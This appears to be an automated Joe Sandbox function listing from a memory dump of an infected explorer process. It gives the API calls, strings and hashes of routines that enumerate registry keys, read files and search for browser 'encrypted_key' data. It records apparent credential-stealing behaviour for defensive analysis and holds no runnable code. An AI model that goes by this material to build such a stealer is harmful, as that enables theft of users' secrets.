Instruction Fuzzy Hash: C121D075202380ABDF54CEAACC85EA737AAEF85310F158169FD44CB246D634EC40CBA2

Function 006EB87B Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 202
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 006EB8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 006EB96F

Strings

Ss, xrefs: 006EB96F
winOpen, xrefs: 006EBA22
psow, xrefs: 006EBA95

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen$Ss
API String ID: 2416746761-765041518
Opcode ID: dfdef8362398b482639ed49ca418437049283185487e897db6efa1d56c538daa
Instruction ID: 678fa3571f3a3edc2317ebd64c7714f7f6fe4034a0a5d049be3984aa1d1509ca
Opcode Fuzzy Hash: dfdef8362398b482639ed49ca418437049283185487e897db6efa1d56c538daa
Instruction Fuzzy Hash: 1A71C171A063429FDB50DF2AC88174BBBE2FF88324F104A2DF96497291D774E944CB92

Function 006EB1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 006EB31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 006EB34F

Strings

winShmMap2, xrefs: 006EB2CF
winShmMap3, xrefs: 006EB399
winShmMap1, xrefs: 006EB278

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 9b6a45a2eae32452cc5184d31ef89d889cca858454108e1126aa494edf728aa3
Instruction ID: 5984612bb25d632ae04c48c8fa14621e9ab1bb75c51c4347f219ce1f7262eb8d
Opcode Fuzzy Hash: 9b6a45a2eae32452cc5184d31ef89d889cca858454108e1126aa494edf728aa3
Instruction Fuzzy Hash: 68519C75205781DFDB25CF5AC882A6BB7E6EF84304F10882EE9828B391DB74EC05CB51

Function 006E2E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

StrStrIW.KERNELBASE(?,?), ref: 006E2E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 006E2EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006E2F54
RegCloseKey.KERNELBASE(?), ref: 006E2F62

Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98

Part of subcall function 006E1BC5: lstrlenW.KERNEL32(00000000,00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BCC
Part of subcall function 006E1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BF0
Part of subcall function 006E1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C05
Part of subcall function 006E1BC5: lstrlenW.KERNEL32(00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C1C

Part of subcall function 006E1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,006E2E83,PathToExe,00000000,00000000), ref: 006E1B16

Strings

PathToExe, xrefs: 006E2E5E

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 406c8ec232392f84431febb233e6168efd3722fda3b4bfab9d7a6f3fff077a65
Instruction ID: fcb076dee93c3b1288056425d9b7da11c16a63f221f5f3afd5801d4307dfcf73
Opcode Fuzzy Hash: 406c8ec232392f84431febb233e6168efd3722fda3b4bfab9d7a6f3fff077a65
Instruction Fuzzy Hash: 4F317E716063926F9715AF22C815CAF7AABEFC5350B00852CB8558B245DE34CD05DBA5

Function 006E4A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

wsprintfW.USER32 ref: 006E4AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 006E4AC7
RegCloseKey.KERNELBASE(?), ref: 006E4AD4

Strings

%s\%08x, xrefs: 006E4A9C
Software, xrefs: 006E4A95

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: 77c12aff45c759f8504a821abb91ea3cf622ed9264ad0834bc2940ad2bd80ea4
Instruction ID: f899858ea173aaa4121e3552d290edd77a1908d790798490ccd497310d1842bb
Opcode Fuzzy Hash: 77c12aff45c759f8504a821abb91ea3cf622ed9264ad0834bc2940ad2bd80ea4
Instruction Fuzzy Hash: 00017671601208BFEB089F95DC8ADFF77AEEB41314F40806EF500A3101EBB02E809679

Function 006E4317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 006E431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 006E4335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 006E4363
RegCloseKey.ADVAPI32(?), ref: 006E43C8

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

Part of subcall function 006E418A: wsprintfW.USER32 ref: 006E4212

Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 006E43B9

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 5bc343e7363f28cbc4bef24d15888b3a8d92f10ab5ca3beeafaaab91537d9e87
Instruction ID: 540377032a8e71e6468a195515b657a6dcb9e370976e8f4b13f25cb9f6d92fbd
Opcode Fuzzy Hash: 5bc343e7363f28cbc4bef24d15888b3a8d92f10ab5ca3beeafaaab91537d9e87
Instruction Fuzzy Hash: 6F1182B1104341BFE715AB21CC49DBF77EDEB88305F00852EF489D2110EB749D489A76

Function 00749247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3152220899.0000000000747000.00000040.80000000.00040000.00000000.sdmp, Offset: 00747000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_747000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4722457049b98821de7590faf61742611ac0c81fb86b126e095da9b9eb0adece
Instruction ID: be8de3db096144259ee2ea1ccbf712600f0103d114f444c571550827a79ba119
Opcode Fuzzy Hash: 4722457049b98821de7590faf61742611ac0c81fb86b126e095da9b9eb0adece
Instruction Fuzzy Hash: ADA12A729547925FDB218E78DCC46A3BBA1EB53324B2C076DC6D18B2C3E7A85807C751

Function 006E19E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98

Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 2629891705ea6b6d9102db847fec353cb798f02358505a2dd4449cbfe75ab7fd
Instruction ID: 487f1f062414a00c01bac00e76ba23b99457f568cda14725e60203639ecaf417
Opcode Fuzzy Hash: 2629891705ea6b6d9102db847fec353cb798f02358505a2dd4449cbfe75ab7fd
Instruction Fuzzy Hash: 1821E7722073C16FE7288B26DD05FBB77EAEBCA745F044A2DF5859A240E635CD40A721

Function 006E1EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 006E1ED5

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E1F0C
RegCloseKey.ADVAPI32(?), ref: 006E1F98

Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E1F82

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 66a30d5dbeba4e82a7526130127c6f7bd9a7637451b171497b9b36e6bccd81b3
Instruction ID: d97ace1bd96b5e74f641dbf0886e32af6cd72437552491c934ad22e6eee5b261
Opcode Fuzzy Hash: 66a30d5dbeba4e82a7526130127c6f7bd9a7637451b171497b9b36e6bccd81b3
Instruction Fuzzy Hash: E3218E712083817FE705AB22CC49D6FBBEEEF89344F00892DF49992211DB35CD05AB62

Function 006E1C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,006E3E1E,00000000,?,006E3FA8), ref: 006E1C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,006E3FA8), ref: 006E1C56
CloseHandle.KERNELBASE(00000000,?,006E3FA8), ref: 006E1C91

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,006E3FA8), ref: 006E1C76

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 4602b7f2fac2d1955ac542f4146f9d9c827d2866a516f637b3e7462ab3638e9f
Instruction ID: 82a969803f3a65d693267c5ad69392fc576cd0004c3cfdc0b12ae63bf9e63802
Opcode Fuzzy Hash: 4602b7f2fac2d1955ac542f4146f9d9c827d2866a516f637b3e7462ab3638e9f
Instruction Fuzzy Hash: 74F0F4312013187BD2241B26DC88E7F7A5DDB43BFAB210718F405D6190EB2A6C455175

Function 006E2FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,006E3E30,00000000,00000000,?,006E3FA8), ref: 006E2FC1
lstrlen.KERNEL32("encrypted_key":",?,006E3FA8), ref: 006E2FCE
StrStrIA.SHLWAPI("encrypted_key":",0073692C,?,006E3FA8), ref: 006E2FDD

Part of subcall function 006E190B: lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
Part of subcall function 006E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,?), ref: 006E1946
Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,00000000), ref: 006E194A

Strings

"encrypted_key":", xrefs: 006E2FBA, 006E2FBF, 006E2FCD, 006E2FDC

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: 78962bb1fb3fdb8b1fcf8cec08b79b3963cdd01576f46b668e591513336a792c
Instruction ID: 130c2bce016398245b477c673f9d11faf312659738527d583fb818b3793670e0
Opcode Fuzzy Hash: 78962bb1fb3fdb8b1fcf8cec08b79b3963cdd01576f46b668e591513336a792c
Instruction Fuzzy Hash: 81E02B227477A93FB3616BB61C648873F1E9E03211305C078F10197213DF9A8801D2A8

Function 006EBAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 006EBB40

Strings

winDelete, xrefs: 006EBB6A

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: 55b60127e0d1e6c2e66a5fff12a24f36e00072b8846fd4daf93dc7326315c9a7
Instruction ID: 56efbbc1b5e3ff0bc018db2637e1c8c82510200a29d5d2e93b162b483dc7e362
Opcode Fuzzy Hash: 55b60127e0d1e6c2e66a5fff12a24f36e00072b8846fd4daf93dc7326315c9a7
Instruction Fuzzy Hash: 3B110835A02398EB9711ABA7CC418BF7777DB91760F109269F801E7388DF709D029756

Function 006E2EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 006E2EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006E2F54
RegCloseKey.KERNELBASE(?), ref: 006E2F62

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 157238704be3245763143a54e715c5396ef6446e4f0b950fff50d7c42c67be08
Instruction ID: b6096e19d1f79cac39528af7932b2daf7ae15777a6507678b00402799807f9bf
Opcode Fuzzy Hash: 157238704be3245763143a54e715c5396ef6446e4f0b950fff50d7c42c67be08
Instruction Fuzzy Hash: C501A231206391ABD719AF22DC15DAF7BAFEFC5355F00842DF80986150DE358C49EBA6

Function 006E4B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006E4B74
CoUninitialize.COMBASE ref: 006E4B83
ExitProcess.KERNEL32 ref: 006E4B8B

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 33b87f5cb0cd26ebe5d8423be9c85b3603db46c8a7e5415653329dc2c6f14839
Instruction ID: 1265973fa1867d47d0adb22fe70ff448468a6b09d235a4bdfd606c33333d21e6
Opcode Fuzzy Hash: 33b87f5cb0cd26ebe5d8423be9c85b3603db46c8a7e5415653329dc2c6f14839
Instruction Fuzzy Hash: 0CC04C302463416BF6802BF15C0D70A3555BB04B13F11C014F205C5091DE544400862A

Function 006E9FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 006E9FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 006EA00E

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 3641a505df3076e00b0d7f43b6669ca316a8cf6f9bac2d36c56d5778aa197198
Instruction ID: 30e524e8c289a37caae170053185df34e71741517bdabf2dbf9d467e8b500c88
Opcode Fuzzy Hash: 3641a505df3076e00b0d7f43b6669ca316a8cf6f9bac2d36c56d5778aa197198
Instruction Fuzzy Hash: 84F046B674A380BAE7302A92AC84FA3279EDB85789F20881AF941C3341E2706C408231

Function 006E1AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,006E2E83,PathToExe,00000000,00000000), ref: 006E1B16

Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027

Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 006E1B40

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: c9dab60a827a811e5736e934d75390449ba124351303580f706e62b5245838a9
Instruction ID: bda59b98a5f5ec1af8b890abcf1d8dbada081ae22c7895124b8e6382273c337f
Opcode Fuzzy Hash: c9dab60a827a811e5736e934d75390449ba124351303580f706e62b5245838a9
Instruction Fuzzy Hash: ECF0BB367017CC67D6116927DC84D673B4FC7D3396306012DF4598B252EE366C856574

Function 006EA33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 006EA35F

Strings

winSeekFile, xrefs: 006EA381

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: fca056219feaa53ca30fb9eb34e9c0810fa3862a74757cf5e577238ed74dbc27
Instruction ID: aaeee02ad5eb0fb284aa49af0c4613181f70c9b2e374efaabe202d5366f03101
Opcode Fuzzy Hash: fca056219feaa53ca30fb9eb34e9c0810fa3862a74757cf5e577238ed74dbc27
Instruction Fuzzy Hash: 62F02470615304AFD7119FA5DC009BB77AAEB45320F10C36AF821CA2D4DF30ED0096A1

Function 006E9EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04D30000,00000000,?), ref: 006E9EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 006E9ECD

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: e568a1bf5a4445135574df14409586e75e5629704b5c4e22921cc7217fa15b2d
Instruction ID: 0a957e1055de5c4230c1847e0ab587e87623ddfb3fdb3f36f47a3cb5a89284a5
Opcode Fuzzy Hash: e568a1bf5a4445135574df14409586e75e5629704b5c4e22921cc7217fa15b2d
Instruction Fuzzy Hash: E7E0C27B6492107BC2222B95AC05F6FB76ADFD6F11F018016FA00A2261C3389C5187AA

Function 006E9EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(04D30000,00000000,?), ref: 006E9EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 006E9F0E

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: f90e84ca9e0be8d77a6cd5ba707c8ed92c0c1a213ac4e1fe44b9b3cb7d00d9f3
Instruction ID: 5de3a08a8380dce8a26850dde740f2ebf5c4942ad52949226dc2394d3cd06ce7
Opcode Fuzzy Hash: f90e84ca9e0be8d77a6cd5ba707c8ed92c0c1a213ac4e1fe44b9b3cb7d00d9f3
Instruction Fuzzy Hash: FBD0C2B624930077D2002B52AC01F2B777A9F92B00F84800AF10091067C3685491AB3A

Function 006E1B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
CloseHandle.KERNELBASE(00000000), ref: 006E1B8F

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: fa9f194956b269c1dcb30235686c677d008ff02a81931193da588b8d368b1af4
Instruction ID: 41b4e0877c888a6e965848e376cb738317b55f3e5a09e55c687cd4f23341ba15
Opcode Fuzzy Hash: fa9f194956b269c1dcb30235686c677d008ff02a81931193da588b8d368b1af4
Instruction Fuzzy Hash: 93D0C27120333032E57513363C1CEE72E0DDF036B2B048610B40DD81D0E2248C8381E0

Function 006E1011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 006E116F

GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: c071f268bf81c43604724cb72f2e95230d46a965e3d648775dc71ab9fef88e5f
Instruction ID: 46ed2ba341752e694365d2a43e6d5bfd5a53c902b5bbbdb5795ad5b7c38a71d1
Opcode Fuzzy Hash: c071f268bf81c43604724cb72f2e95230d46a965e3d648775dc71ab9fef88e5f
Instruction Fuzzy Hash: 77C08C710023B862D9A027A53C0CBCA2B1ACF0A223F008081B6019B242CAB98C4092A4

Function 006E1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin
